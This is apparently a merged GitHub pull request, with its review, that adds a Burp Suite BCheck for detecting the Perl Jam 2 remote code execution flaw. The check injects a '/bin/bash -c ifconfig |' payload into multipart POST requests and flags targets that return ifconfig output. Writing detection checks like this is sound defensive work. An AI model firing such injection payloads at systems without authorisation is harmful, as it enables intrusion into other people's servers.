### PR TITLE
Create Perl Jam 2 - RCE.bcheck

### PR DESCRIPTION
**Pull request by Hipapheralkus**
### BCheck Contributions

* [x] BCheck compiles and executes as expected
* [x] BCheck contains appropriate metadata (name, version, author, description and appropriate tags)
* [x] Only .bcheck files have been added or modified
* [x] BCheck is in the appropriate folder
* [x] PR contains single or limited number of BChecks (Multiple PRs are preferred)
* [x] BCheck attempts to minimize false positives

### CODE REVIEW

File: other/Perl Jam 2 - RCE.bcheck [hunk 1]
```diff
@@ -0,0 +1,35 @@
...
+    author: "Andrej Šimko @ Accenture"
+    tags: "Perl JAM 2","Perl","Remote Code Execution","RCE"
+
+define: 
+    request_all_headers = `{base.request.headers}`
+    multi_line = `{regex_replace({request_all_headers},"[\s\S]+boundary=","")}`
+    boundary = `{regex_replace({multi_line},"[\r\n].*","")}`
+    request_original_body = `{base.request.body}`
+
+    #this should potentially be changed to work on Windows deployment
```
Comment (PortSwiggerWiener) [inline other/Perl Jam 2 - RCE.bcheck:14]: would this be better at the top of the define block to draw more attention to it? The user needs to potentially change this value, while the others are fixed.

File: other/Perl Jam 2 - RCE.bcheck [hunk 2]
```diff
@@ -0,0 +1,35 @@
...
+    rce_payload = "/bin/bash%20-c%20ifconfig%20|"
+
+given request then
+    if "multipart/form-data" in {base.request.headers} and {base.request.method} matches "POST" then
```
Comment (PortSwiggerWiener) [inline other/Perl Jam 2 - RCE.bcheck:18]: Really minor, but you could flip the order of these checks as the method check is cheaper.

File: other/Perl Jam 2 - RCE.bcheck [hunk 3]
```diff
@@ -0,0 +1,35 @@
...
+        appending body:`{request_original_body}`
+        
+    if "127.0.0.1" in {RCE.response.body} and "RX packets" in {RCE.response.body} then
+
+        report issue:
+           severity: high
+           confidence: certain
+           detail: "The application is vulnerable to Perl Remote Code Execution. For more information, check https://www.blackhat.com/docs/asia-16/materials/asia-16-Rubin-The-Perl-Jam-2-The-Camel-Strikes-Back.pdf. All credit goes to Netanel Rubin @na7irub."
+           remediation: "Stop using Perl."
+        end if
```
Comment (PortSwiggerWiener) [inline other/Perl Jam 2 - RCE.bcheck:34]: Please can you bring these two 'end if' statements in one level of indentation.

**Review by PortSwiggerWiener — COMMENTED** [review]
Many thanks for your submission. I've added minor review comments.

**Comment by Hipapheralkus** [comment]
Is this better?:)

**Review by PortSwiggerWiener — APPROVED** [review]
Many thanks for making the updates.

Looks good. 👍

**Review by Hannah-PortSwigger — APPROVED** [review]
Looks good 👍

**Comment by michael-eaton-portswigger** [comment]
@Hipapheralkus As a contributor to our GitHub repository, we would like to invite you to our closed Discord community.

It is a place where passionate Burp users, including people who directly work on building and developing Burp here at PortSwigger, can talk about the tooling and web security in general.

If you would like to join, please email us at support@portswigger.net and we will send over an invite link.

Thank you!

**Pull request merged**